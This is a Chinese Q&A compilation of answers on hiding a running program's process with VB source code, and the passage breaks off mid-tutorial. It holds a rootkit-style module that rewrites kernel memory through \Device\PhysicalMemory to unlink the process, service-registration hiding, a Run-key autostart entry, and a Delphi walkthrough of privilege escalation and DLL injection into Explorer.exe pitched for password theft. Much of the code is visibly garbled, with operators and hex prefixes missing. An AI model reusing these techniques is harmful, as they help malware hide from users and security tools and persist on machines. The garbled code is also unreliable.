vb隐藏进程源码下载(vbs隐藏进程)
本文目录一览:
- 1、在VB中隐藏弹出窗口的进程?
- 2、在VB中有隐藏进程的代码吗?要最新的。
- 3、请问 VB中如何实现进程隐藏? 最好有代码示例
- 4、用VB实现隐藏进程
- 5、VB如何能在SP3下隐藏进程的源代码
- 6、VB隐藏进程的代码是什么?
在VB中隐藏弹出窗口的进程?
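在模块中加入以下代码,然后在需要隐藏进程的窗体的 Load 或 Initialize 事件中调用 HideCurrentProcess。注意:代码中的结构偏移量只针对 Windows 2000(5.0)和 Windows XP(5.1)给出,其他版本下这些偏移量保持为 0;另外本页的代码在转载时丢失了部分符号,不能直接编译。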
Option Explicit
' Status codes, section/object access masks and security-information flags used by the
' ZwOpenSection / GetSecurityInfo / SetSecurityInfo calls further down in this module.
' NOTE(review): the hex literals appear without their VB prefix (e.g. "HC0000004"), most likely
' lost when the page was extracted; as shown, each "H..." token reads as an identifier, not a number.
Private Const STATUS_INFO_LENGTH_MISMATCH = HC0000004
Private Const STATUS_ACCESS_DENIED = HC0000022
Private Const STATUS_INVALID_HandLE = HC0000008
Private Const ERROR_SUCCESS = 0
' Access rights requested on the section object.
Private Const SECTION_MAP_WRITE = H2
Private Const SECTION_MAP_READ = H4
' Rights needed to read and rewrite the object's DACL.
Private Const READ_CONTROL = H20000
Private Const WRITE_DAC = H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = H4
' VB mirrors of native NT structures, with pointer/handle members declared as Long
' (so the layout only matches a 32-bit process).
' IO_STATUS_BLOCK is declared here but not referenced anywhere else in the visible listing.
Private Type IO_STATUS_BLOCK
Status As Long
Information As Long
End Type
' Counted string filled in by RtlInitUnicodeString; Buffer holds the address of the characters.
Private Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type
' Object-attribute flags; only declared, OpenPhysicalMemory passes 0 for Attributes.
Private Const OBJ_INHERIT = H2
Private Const OBJ_PERMANENT = H10
Private Const OBJ_EXCLUSIVE = H20
Private Const OBJ_CASE_INSENSITIVE = H40
Private Const OBJ_OPENIF = H80
Private Const OBJ_OPENLINK = H100
Private Const OBJ_KERNEL_HandLE = H200
Private Const OBJ_VALID_ATTRIBUTES = H3F2
' Argument block for ZwOpenSection; ObjectName receives VarPtr() of a UNICODE_STRING.
' NOTE(review): "SecurityDeor" is presumably a mangled "SecurityDescriptor" - confirm against the original post.
Private Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDeor As Long
SecurityQualityOfService As Long
End Type
' Types and enums for the advapi32 ACL helpers (SetEntriesInAcl, GetSecurityInfo, SetSecurityInfo).
' Enum members without an explicit value count up from 0 in declaration order.
' ACL and AceArray are declared but not referenced elsewhere in the visible listing.
Private Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
' How an EXPLICIT_ACCESS entry is merged into an ACL; this module only uses GRANT_ACCESS.
Private Enum ACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
End Enum
Private Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End Enum
' Whether the trustee is identified by SID or by name; this module uses TRUSTEE_IS_NAME.
Private Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End Enum
Private Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End Enum
' Identifies the account an access entry applies to.
Private Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End Type
' One access entry: permission mask, merge mode, inheritance flags and the trustee.
Private Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End Type
Private Type AceArray
List() As EXPLICIT_ACCESS
End Type
' Kind of securable object passed to Get/SetSecurityInfo; this module passes SE_KERNEL_OBJECT.
Private Enum SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE = 0
SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
End Enum
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long,
ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As
Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long,
ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As
Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As
Long
Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias
"SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries
As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias
"BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal
pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As
ACCESS_MODE, ByVal Inheritance As Long)
Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As
UNICODE_STRING, ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long,
ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As
Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As
Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal
dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As
Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination
As Any, Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA"
(LpVersionInformation As OSVERSIONINFO) As Long
' Buffer filled by GetVersionEx; dwOSVersionInfoSize must be set to Len() of the structure first.
Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
' Module state shared by the routines below.
Private verinfo As OSVERSIONINFO ' OS version, refreshed by HideCurrentProcess and OpenPhysicalMemory
Private g_hNtDLL As Long ' not referenced in the visible listing
Private g_pMapPhysicalMemory As Long ' address of the 4 KB view mapped by OpenPhysicalMemory
Private g_hMPM As Long ' handle to the \Device\PhysicalMemory section
Private aByte(3) As Byte ' 4-byte scratch buffer used by LinearToPhys
Public Sub HideCurrentProcess()
' Hides the current application's process from the process list (original author's description).
' What the visible code does: selects three structure offsets by OS version, opens the
' physical-memory section, reads a "thread" value from a fixed address, follows it to a
' "process" address, reads that entry's forward/backward link values and rewrites the two
' neighbouring entries so that they reference each other instead of this entry.
' NOTE(review): presumably these links are the kernel's per-process list entry on 32-bit
' Windows 2000/XP - confirm. Only code that walks that list stops seeing the entry; views
' derived from threads, handles or other kernel tables are not touched by these two writes,
' which is what cross-view comparison relies on to reveal such a process.
' NOTE(review): comparison operators and the hex-literal prefix are missing throughout this
' listing (e.g. "If OpenPhysicalMemory 0 Then"), so it is not compilable as shown.
Dim thread As Long, process As Long, fw As Long, bw As Long
Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) 0 Then
' Offsets are assigned only for platform id 2, major version 5, minor version 0 or 1.
' On any other version all three stay 0, yet the writes below are still attempted if the
' section can be opened.
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
select Case verinfo.dwMinorVersion
Case 0
lOffsetFlink = HA0
lOffsetBlink = HA4
lOffsetPID = H9C
Case 1
lOffsetFlink = H88
lOffsetBlink = H8C
lOffsetPID = H84
End select
End If
End If
End If
' lOffsetPID is assigned above but never read in the visible code.
If OpenPhysicalMemory 0 Then
' Fixed address read first; presumably the current-thread pointer of the processor
' control region on these OS versions - TODO confirm.
thread = GetData(HFFDFF124)
process = GetData(thread + H44)
fw = GetData(process + lOffsetFlink)
bw = GetData(process + lOffsetBlink)
' Two raw writes into kernel memory: next.back = previous, previous.forward = next.
SetData fw + 4, bw
SetData bw, fw
' Only the section handle is closed; the view stored in g_pMapPhysicalMemory is not unmapped here.
CloseHandle g_hMPM
End If
End Sub
Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
' Adds an access entry granting SECTION_MAP_WRITE to "CURRENT_USER" to the DACL of the
' section object behind hSection, then writes the new DACL back to the object.
' hSection must have been opened with READ_CONTROL and WRITE_DAC (see OpenPhysicalMemory).
' None of the API return values are checked, so a failed step is not noticed.
' NOTE(review): two calls are wrapped across lines without a continuation character and the
' string concatenation operator before vbNullChar is missing - extraction damage, not valid VB as shown.
Dim pDacl As Long
Dim pNewDacl As Long
Dim pSD As Long
Dim dwRes As Long
Dim ea As EXPLICIT_ACCESS
' Fetch the current DACL (pDacl) and the security descriptor that owns it (pSD).
GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0,
pDacl, 0, pSD
ea.grfAccessPermissions = SECTION_MAP_WRITE
ea.grfAccessMode = GRANT_ACCESS
ea.grfInheritance = NO_INHERITANCE
ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName = "CURRENT_USER" vbNullChar
' Merge the new entry with the existing DACL, then apply the result to the object.
SetEntriesInAcl 1, ea, pDacl, pNewDacl
SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0,
ByVal pNewDacl, 0
' The label is never jumped to in the visible code; execution simply falls through.
' dwRes is declared above but never used.
CleanUp:
LocalFree pSD
LocalFree pNewDacl
End Sub
Private Function OpenPhysicalMemory() As Long
' Opens the \Device\PhysicalMemory section for read/write, stores the handle in g_hMPM and
' maps one 4 KB page at a version-specific offset into g_pMapPhysicalMemory.
' Returns the section handle when the mapping succeeded; otherwise the return value stays 0.
' If the first open is denied, the section is reopened with READ_CONTROL/WRITE_DAC, its DACL
' is rewritten by SetPhyscialMemorySectionCanBeWrited, and the read/write open is retried.
' NOTE(review): Microsoft documents that user-mode access to \Device\PhysicalMemory is no
' longer permitted starting with Windows Server 2003 SP1; the version switch below only
' recognises 5.0 and 5.1.
' NOTE(review): the ZwOpenSection calls are wrapped without a continuation character and
' operators/hex prefixes are missing (extraction damage).
Dim Status As Long
Dim PhysmemString As UNICODE_STRING
Dim Attributes As OBJECT_ATTRIBUTES
RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
Attributes.Length = Len(Attributes)
Attributes.RootDirectory = 0
Attributes.ObjectName = VarPtr(PhysmemString)
Attributes.Attributes = 0
Attributes.SecurityDeor = 0
Attributes.SecurityQualityOfService = 0
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE,
Attributes)
If Status = STATUS_ACCESS_DENIED Then
' The status of this DACL-access open is overwritten below without being checked.
Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
SetPhyscialMemorySectionCanBeWrited g_hMPM
CloseHandle g_hMPM
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE,
Attributes)
End If
' Section offset of the page to map; presumably the physical address of the page
' directory on each OS version - TODO confirm. Stays 0 on unrecognised versions.
Dim lDirectoty As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
select Case verinfo.dwMinorVersion
Case 0
lDirectoty = H30000
Case 1
lDirectoty = H39000
End select
End If
End If
End If
If Status = 0 Then
' Access value 4 equals SECTION_MAP_READ as declared in this module; H1000 bytes = one page.
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, H1000)
If g_pMapPhysicalMemory 0 Then OpenPhysicalMemory = g_hMPM
End If
End Function
Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
' Translates the address addr into an offset within the physical-memory section by walking a
' two-level table that starts at BaseAddress (the page mapped by OpenPhysicalMemory).
' Returns 0 when the first-level or second-level entry does not have bit 0 set.
' The arithmetic matches 32-bit paging with 4-byte entries: top 10 bits index the first
' level, the next 10 bits the second level, low 12 bits are the page offset; an entry with
' bit H80 set is treated as a 4 MB page.
' NOTE(review): operators and hex prefixes are missing in this listing (extraction damage).
Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
Dim lTemp As Long
VAddr = addr
' Go through the byte buffer and a Double so that addresses with the top bit set yield a
' non-negative first-level index (a signed Long division would not).
CopyMemory aByte(0), VAddr, 4
lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))
PGDE = BaseAddress + lTemp * 4
' Replace the entry's address with the entry's 4-byte content.
CopyMemory PGDE, ByVal PGDE, 4
If (PGDE and 1) 0 Then
lTemp = PGDE and H80
If lTemp 0 Then
PAddr = (PGDE and HFFC00000) + (VAddr and H3FFFFF)
Else
' Map the page that holds the second-level table and read the matching entry.
PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE and HFFFFF000, H1000)
lTemp = (VAddr and H3FF000) / (2 ^ 12)
PTE = PGDE + lTemp * 4
CopyMemory PTE, ByVal PTE, 4
If (PTE and 1) 0 Then
PAddr = (PTE and HFFFFF000) + (VAddr and HFFF)
' The temporary view is released only on this branch.
UnmapViewOfFile PGDE
End If
End If
End If
LinearToPhys = PAddr
End Function
Private Function GetData(addr As Long) As Long
' Reads the 4-byte value stored at address addr: translates it with LinearToPhys, maps the
' containing 4 KB page of the section read-only (access value 4), copies the value out and
' unmaps the page. Returns 0 when the page cannot be mapped.
' A failed translation (LinearToPhys returning 0) is not distinguished and leads to a read
' from section offset 0.
Dim phys As Long, tmp As Long, ret As Long
phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, 4, 0, phys and HFFFFF000, H1000)
If tmp 0 Then
' Offset within the page, rounded down to a 4-byte boundary.
ret = tmp + ((phys and HFFF) / (2 ^ 2)) * 4
CopyMemory ret, ByVal ret, 4
UnmapViewOfFile tmp
GetData = ret
End If
End Function
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
' Writes the 4-byte value data to address addr: translates it with LinearToPhys, maps the
' containing 4 KB page of the section with SECTION_MAP_WRITE, copies the value in and unmaps.
' Returns True when the page could be mapped, False otherwise.
' A failed translation (LinearToPhys returning 0) is not checked, in which case the write
' would go to section offset 0; a raw write like this is not synchronised with anything
' else using the same memory.
Dim phys As Long, tmp As Long, x As Long
phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys and HFFFFF000, H1000)
If tmp 0 Then
' Offset within the page, rounded down to a 4-byte boundary.
x = tmp + ((phys and HFFF) / (2 ^ 2)) * 4
CopyMemory ByVal x, data, 4
UnmapViewOfFile tmp
SetData = True
End If
End Function
Private Function ByteArrToLong(inByte() As Byte) As Double
' Combines elements 0..3 of inByte into one number, element 0 being the least significant
' byte. The result is a Double so that values with the top bit set stay positive.
' NOTE(review): "H100" is presumably the hex literal for 256 with its prefix lost in extraction.
Dim I As Integer
For I = 0 To 3
ByteArrToLong = ByteArrToLong + inByte(I) * (H100 ^ I)
Next I
End Function
在VB中有隐藏进程的代码吗?要最新的。
在进程中隐藏的
Public Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Public Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
' dwType values for RegisterServiceProcess: 1 is passed by MakeMeService, 0 by UnMakeMeService.
Public Const RSP_SIMPLE_SERVICE = 1
Public Const RSP_UNREGISTER_SERVICE = 0
下面代码为隐藏
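Public Sub MakeMeService()
    ' Registers the current process as a "simple service" through RegisterServiceProcess,
    ' which (per the original author) removes the program from the task list.
    ' Platform note: a later answer on this page states that the API is available on
    ' Windows 98 but not on NT-based systems (2000, XP), so this has no effect there.
    ' The API result is stored but not evaluated.
    Dim pid As Long
    ' The original declared "reserv" but assigned "regserv"; the declaration now matches.
    Dim regserv As Long
    pid = GetCurrentProcessId() ' ID of the currently running program
    regserv = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE)
End Sub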
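' Undo the hiding
Public Sub UnMakeMeService()
    ' Unregisters the current process as a service through RegisterServiceProcess, the
    ' inverse of MakeMeService (same mechanism, dwType = RSP_UNREGISTER_SERVICE).
    ' The API result is stored but not evaluated.
    Dim pid As Long
    ' The original declared "reserv" but assigned "regserv"; the declaration now matches.
    Dim regserv As Long
    pid = GetCurrentProcessId()
    regserv = RegisterServiceProcess(pid, RSP_UNREGISTER_SERVICE)
End Sub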
Private Sub Command1_Click()
    ' Button handler: register the program as a service (hide it).
    MakeMeService
End Sub
Private Sub Command2_Click()
    ' Button handler: unregister the program as a service (show it again).
    UnMakeMeService
End Sub
Private Sub Form_Load()
    ' Centre Form1 on the screen, horizontally and vertically.
    With Form1
        .Left = Screen.Width / 2 - .Width / 2
        .Top = Screen.Height / 2 - .Height / 2
    End With
End Sub
开机自动启动
'使用下面这三个API与两个常数(标记部份为快捷键方式增加到开始下的启动)
Private Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
' Predefined registry root and the string value type used by Command1_Click below.
' NOTE(review): "H80000002" is presumably a hex literal whose prefix was lost in extraction.
Const HKEY_LOCAL_MACHINE = H80000002
Const REG_SZ = 1
Private Sub Command1_Click()
    ' Writes a fixed executable path into the default (unnamed) value of the
    ' HKEY_LOCAL_MACHINE ...\CurrentVersion\Run key, the machine-wide autostart location.
    ' No return value is checked, so a failed RegCreateKey (for example without
    ' administrative rights) still leads to the set/close calls on whatever handle came back.
    ' NOTE(review): the last RegSetValue argument (4) does not match the string length; the
    ' API is documented as ignoring that parameter - confirm.
    ' This key is a standard place that autostart-inspection and registry-monitoring tools check.
    Const RUN_KEY As String = "software\microsoft\windows\currentVersion\run"
    Const EXE_PATH As String = "c:\windows\abc.exe"
    Dim hRunKey As Long

    ' Open (or create) the Run key under HKEY_LOCAL_MACHINE
    RegCreateKey HKEY_LOCAL_MACHINE, RUN_KEY, hRunKey
    ' Set the key's default value to the full path of the exe
    RegSetValue hRunKey, vbNullString, REG_SZ, EXE_PATH, 4
    ' Release the key handle
    RegCloseKey hRunKey
End Sub
窗口总是在最前面
Option Explicit
'
' Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Private Declare Function SetWindowPos Lib "user32" ( _
ByVal hwnd As Long, _
ByVal hWndInsertAfter As Long, _
ByVal x As Long, ByVal y As Long, _
ByVal cx As Long, ByVal cy As Long, _
ByVal wFlags As Long _
) As Long
' SetWindowPos arguments used by Form_load: insert-after marker for "topmost" and the show flag.
' NOTE(review): "H40" is presumably a hex literal whose prefix was lost in extraction.
Const HWND_TOPMOST = -1
Const SWP_SHOWWINDOW = H40
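Private Sub Form_load()
    ' Places the form above all other windows (topmost) at a size of 300 x 300.
    ' According to the original author this may not take effect when run inside the VB IDE,
    ' but works once the project is compiled to an EXE.
    ' Fix: the call was split over two lines without a continuation character and one
    ' comment line started with a typographic apostrophe; both made the sub invalid VB.
    ' NOTE(review): CurrentX/CurrentY are the form's drawing coordinates, not its screen
    ' position - kept as in the original; confirm this is what the author intended.
    Dim retValue As Long
    retValue = SetWindowPos(Me.hwnd, HWND_TOPMOST, Me.CurrentX, _
                            Me.CurrentY, 300, 300, SWP_SHOWWINDOW)
End Sub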
请问 VB中如何实现进程隐藏? 最好有代码示例
'隐藏进程在9X和2K中是不大一样的, 例如说你想隐藏一个进程
'在9X里面一个API就可以了, 可是2K以上系统就不行了
'2K里面隐藏进程一般都是系统服务, 所以不会显示
'大家多利用这个特性来弄, 也许有写VXD的
'不过VB里面想实现一般是写成服务了
'写服务比较普遍, 那么你取得服务就可以了
'给出一个WINDOWS服务管理器的部分代码。
'该代码在WINXP,VB6+SP6,WMI1.2(XP自带)测试通过。
'测试代码前请添加对MS WMI 1.X的引用,
'添加一个LISTVIEW(MS CMD CON 6.0里面的),
'名称默认,一个TEXTBOX,名称为TxtDescription 具体代码如下:
Option Explicit
' Form-level WMI scripting objects (these types require the project reference to the
' Microsoft WMI Scripting library mentioned in the text above).
Dim objSWbemLocator As SWbemLocator ' factory used to connect to WMI
Dim objSWbemServices As SWbemServices ' connection to one namespace on one computer
Dim objSWbemObjectSet As SWbemObjectSet ' result set of the last query
Dim objSWbemObject As SWbemObject ' loop variable for one result row
' Connection target and queried class; assigned in Form_Load.
Dim strComputer As String, strNameSpace As String, strClass As String
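Private Sub Form_Load()
    ' Sets up the ListView columns, connects to the local WMI namespace root\cimv2 and
    ' fills the list with all Win32_Service instances.
    ' Fix: in the extracted listing the three statements after strClass had been collapsed
    ' into the trailing comment of that line, so no WMI connection was ever made.
    ListView1.ColumnHeaders.Clear
    ListView1.ColumnHeaders.Add , , "名称", 2600
    ListView1.ColumnHeaders.Add , , "状态", 1000
    ListView1.ColumnHeaders.Add , , "启动类型", 1000
    ListView1.ColumnHeaders.Add , , "路径", 2600
    ListView1.ColumnHeaders.Add , , "登录身份", 1400
    ListView1.ColumnHeaders.Add , , "进程ID", 900
    ListView1.ColumnHeaders.Add , , "服务类型", 1400
    ListView1.View = lvwReport
    ListView1.FullRowSelect = True

    strComputer = "."             ' computer name; "." is the local machine
    strNameSpace = "root\cimv2"   ' WMI namespace to connect to
    strClass = "Win32_Service"    ' WMI class to enumerate

    ' Create the locator object, then connect to the chosen computer and namespace.
    Set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
    Set objSWbemServices = objSWbemLocator.ConnectServer(strComputer, strNameSpace)

    ' Populate the service list.
    RefreshList
End Sub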
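' Refresh the service list
Sub RefreshList()
    ' Clears ListView1 and adds one row per Win32_Service instance returned by WMI:
    ' display name, state, start mode, image path, logon account, process ID and service
    ' type. The description (or "无" when it is Null) is kept in the row's Tag.
    ' Rows are keyed "a0", "a1", ... in enumeration order.
    ' The ProcessId column gives the PID of the process hosting each running service, which
    ' is how a process running as a service can still be enumerated.
    ' Fixes: restored the string concatenation operators and the statements that had been
    ' collapsed into a comment; selecting the first row is skipped when the list is empty.
    Dim i As Long
    Dim strKey As String

    ListView1.ListItems.Clear
    ' WQL query returning every instance of the configured class.
    Set objSWbemObjectSet = objSWbemServices.ExecQuery("SELECT * FROM " & strClass)
    For Each objSWbemObject In objSWbemObjectSet
        strKey = "a" & i
        ListView1.ListItems.Add , strKey, objSWbemObject.DisplayName
        With ListView1.ListItems(strKey)
            .SubItems(1) = objSWbemObject.State
            .SubItems(2) = objSWbemObject.StartMode
            .SubItems(3) = objSWbemObject.PathName
            .SubItems(4) = objSWbemObject.StartName
            .SubItems(5) = objSWbemObject.ProcessId
            .SubItems(6) = objSWbemObject.ServiceType
            If IsNull(objSWbemObject.Description) Then
                .Tag = "无"
            Else
                .Tag = objSWbemObject.Description
            End If
        End With
        i = i + 1
    Next
    ' ListItems(1) raises an error on an empty list, so only select when rows exist.
    If ListView1.ListItems.Count > 0 Then
        Set ListView1.SelectedItem = ListView1.ListItems(1)
    End If
End Sub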
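Private Sub ListView1_ItemClick(ByVal Item As MSComctlLib.ListItem)
    ' Updates the two command buttons according to the clicked service's state and shows
    ' the service description in TxtDescription.
    ' Fixes: restored the string concatenation operators and the straight quotes of the WQL
    ' literal, and escaped the display name before embedding it in the query (a service
    ' display name is data taken from the system and may itself contain a quote or backslash).
    Dim strName As String

    If Item.SubItems(1) = "Stopped" Then
        Command1.Enabled = False
        Command2.Enabled = True
    Else
        Command1.Enabled = True
        Command2.Enabled = False
    End If

    ' WQL string literals use backslash escaping; escape the backslash first, then the quote.
    strName = Replace(ListView1.SelectedItem.Text, "\", "\\")
    strName = Replace(strName, "'", "\'")

    ' Query the instance whose DisplayName equals the selected row's text.
    Set objSWbemObjectSet = objSWbemServices.ExecQuery("SELECT * FROM " & strClass & _
        " WHERE DisplayName = '" & strName & "'")
    For Each objSWbemObject In objSWbemObjectSet
        If IsNull(objSWbemObject.Description) Then
            TxtDescription.Text = "无"
        Else
            TxtDescription.Text = objSWbemObject.Description
        End If
    Next

    ' Show the description cached in the row's Tag (as in the original, this overwrites
    ' whatever the query above produced).
    TxtDescription.Text = ListView1.ListItems("a" & ListView1.SelectedItem.Index - 1).Tag
End Sub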
用VB实现隐藏进程
晕,二楼的代码怎么那么熟悉?似乎是我去年发的。。
隐藏进程现在常用的是进程插入技术,找一个进程:如Explorer.exe,将自身隐藏在这个进程之内
不过这样的代码还是会被杀毒软件发现,代码就用现成的了:
第一步,提升本进程的系统权限。
因为我们要操作的是系统中的其他进程,没有足够的系统权限是无法读取甚至写入其他进程的内存地址的。提升进程权限可能用到以下的函数:
1.函数OpenProcessToken(
HANDLE ProcessHandle, // 进程的句柄
DWORD DesiredAccess, // 对进程的访问描述
PHANDLE TokenHandle // 打开进程令牌的句柄指针
);
这个函数的作用是打开进程令牌。
2.函数LookupPrivilegeValue(
LPCTSTR lpSystemName, //系统名称
LPCTSTR lpName, // 特权名称
PLUID lpLuid // 本地系统唯一的ID号
);
这个函数将会返回一个本地系统内独一无二的ID,来用于系统权限的更改,它的第1个参数是系统名,nil表示本系统。第2个参数是特权的名字。第3个参数用来接收函数返回的ID。
3.函数AdjustTokenPrivileges(
HANDLE TokenHandle, //更改权限的令牌环句柄
BOOL DisableAllPrivileges, //是否修改所有权限的标志位
PTOKEN_PRIVILEGES NewState, //新的系统权限信息
DWORD BufferLength, //上一个参数的长度
PTOKEN_PRIVILEGES PreviousState, // 返回更改系统特权以前的权限
PDWORD ReturnLength //上一个参数的长度
);
这个函数用于更改进程的系统权限 ,第1个参数是要更改权限的令牌环句柄。第2个参数如果为true表示更改所有的系统权限 ,false表示更改部分。第3个参数是要更改的系统特权的值。第4个参数是第3个参数的大小。第5个参数返回更改系统特权以前的权限,我们不需要就设为nil。第6个参数是第5个参数的大小。
把上面的东西合并起来写成一个函数,我们在其他代码中间直接调用PromoteDebugPrivilege就可以提升本进程的系统权限了。代码如下:
======================================================================
function PromoteDebugPrivilege(const PromoteEnabled: Boolean): Boolean;
{ Enables (PromoteEnabled = True) or disables (False) SeDebugPrivilege in the token of
  the current process.
  Returns True only when the process token could be opened and GetLastError reports
  ERROR_SUCCESS after AdjustTokenPrivileges; False otherwise.
  AdjustTokenPrivileges only switches privileges the token already holds, so for an
  account without SeDebugPrivilege the call changes nothing and the GetLastError
  comparison yields False.
  The result of LookupPrivilegeValue is not checked. }
var
  TokenHandle: THandle;
  NewState: TOKEN_PRIVILEGES;
  ReturnedLen: DWORD;
begin
  Result := False;
  // Without a token handle opened for TOKEN_ADJUST_PRIVILEGES nothing can be changed.
  if not OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, TokenHandle) then
    Exit;

  // One privilege entry: the LUID of SeDebugPrivilege on the local system.
  NewState.PrivilegeCount := 1;
  LookupPrivilegeValue(nil, 'SeDebugPrivilege', NewState.Privileges[0].Luid);

  // Attributes 0 disables the privilege; SE_PRIVILEGE_ENABLED enables it.
  NewState.Privileges[0].Attributes := 0;
  if PromoteEnabled then
    NewState.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;

  ReturnedLen := 0;
  AdjustTokenPrivileges(TokenHandle, False, NewState, SizeOf(NewState), nil, ReturnedLen);
  // The call can report success even when the privilege was not assigned, hence the
  // last-error comparison rather than the function result.
  Result := GetLastError = ERROR_SUCCESS;
  CloseHandle(TokenHandle);
end;
第二步,进入宿主的内存空间
在拥有了进入宿主程序内存的权限之后,我们所要做的是在其内存空间加入一些新的程序代码,或者是让其载入一个Dll文件里面的函数并运行起来。加入新的代码可以省掉一个dll文件,而加载dll文件可以安装一些系统级的钩子,如果我们的隐形程序是一个截获密码的程序,加载dll就是一个很好的选择。
Kernel32.dll中的函数LoadLibraryW可以加载dll,它只需要dll文件的文件路径就可以完成操作,我们可以很容易的在程序代码中实现取出一个文件路径的操作。但是,我们希望在宿主程序中加载,而我们取出的dll文件路径并不存在于宿主程序的内存空间里面,所以我们需要把dll的文件路径写入宿主的内存空间。这些操作可能用到以下的函数:
1.函数OpenProcess(
DWORD dwDesiredAccess, //访问标志
BOOL bInheritHandle, //继承句柄标志
